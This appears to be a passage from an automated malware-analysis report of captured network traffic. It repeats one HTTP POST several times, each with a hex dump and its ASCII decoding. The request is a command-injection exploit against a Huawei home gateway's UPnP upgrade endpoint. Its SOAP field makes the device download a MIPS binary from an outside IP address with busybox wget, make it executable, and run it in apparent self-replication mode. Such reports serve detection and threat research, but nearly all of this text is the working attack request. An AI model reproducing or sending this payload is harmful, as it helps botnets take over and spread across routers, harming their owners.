22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
